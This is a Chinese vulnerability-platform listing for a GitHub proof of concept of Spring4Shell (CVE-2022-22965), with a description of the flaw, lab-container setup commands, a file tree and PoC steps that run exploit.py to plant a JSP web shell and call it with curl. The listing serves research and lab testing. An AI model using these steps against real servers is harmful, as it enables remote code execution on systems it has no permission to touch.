漏洞平台

POC详情： e6f7fffc2807f8b2c539c55fe3c5073c2e282123

来源

https://github.com/me2nuk/CVE-2022-22965

关联漏洞

标题： Spring Framework 代码注入漏洞 (CVE-2022-22965)
描述：Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞，该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响：5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。

描述

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

介绍

# Spring4Shell(CVE-2022-22965)

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965

# Spring4Shell(CVE-2022-22965) Exploit Demo

https://user-images.githubusercontent.com/57348147/161458377-44ab2f76-f947-4599-aa0a-92cbaac819f8.mp4

## Build

```bash
docker pull me2nuk/cves:2022-22965
docker run -it -p 8080:8080 --name=spring4shell me2nuk/cves:2022-22965
```

## POC

```bash
python3 -m pip install -r requirements.txt
python3 exploit.py --url="http://localhost:8080/exploit/greeting" --dir="webapps/ROOT" --file="cmd"
curl http://localhost:8080/cmd.jsp?cmd=id
```

#### References

---

+ [https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)
+ [https://github.com/tweedge/springcore-0day-en/blob/main/ANALYSIS_EN.md](https://github.com/tweedge/springcore-0day-en/blob/main/ANALYSIS_EN.md)
+ [https://github.com/lunasec-io/Spring4Shell-POC](https://github.com/lunasec-io/Spring4Shell-POC)

文件快照


 [4.0K]  /data/pocs/e6f7fffc2807f8b2c539c55fe3c5073c2e282123
├── [1.8M]  CVE-2022-22965 RCE Exploit.mp4
├── [ 255]  Dockerfile
├── [2.7K]  exploit.py
├── [1.7K]  pom.xml
├── [ 990]  README.md
├── [  48]  requirements.txt
├── [4.0K]  src
│   ├── [4.0K]  main
│   │   ├── [4.0K]  java
│   │   │   └── [4.0K]  com
│   │   │       └── [4.0K]  me2nuk
│   │   │           └── [4.0K]  exploit
│   │   │               ├── [ 649]  AppController.java
│   │   │               ├── [ 431]  ExploitApplication.java
│   │   │               └── [ 314]  Greeting.java
│   │   └── [4.0K]  resources
│   │       ├── [   0]  application.properties
│   │       └── [4.0K]  templates
│   │           └── [  27]  hello.html
│   └── [4.0K]  test
│       └── [4.0K]  java
│           └── [4.0K]  com
│               └── [4.0K]  me2nuk
│                   └── [4.0K]  exploit
│                       └── [ 211]  ExploitApplicationTests.java
└── [4.0K]  target
    ├── [4.0K]  classes
    │   ├── [   0]  application.properties
    │   ├── [4.0K]  com
    │   │   └── [4.0K]  me2nuk
    │   │       └── [4.0K]  exploit
    │   │           ├── [1.3K]  AppController.class
    │   │           ├── [ 803]  ExploitApplication.class
    │   │           └── [ 780]  Greeting.class
    │   └── [4.0K]  templates
    │       └── [  27]  hello.html
    └── [4.0K]  test-classes
        └── [4.0K]  com
            └── [4.0K]  me2nuk
                └── [4.0K]  exploit
                    └── [ 544]  ExploitApplicationTests.class

23 directories, 18 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。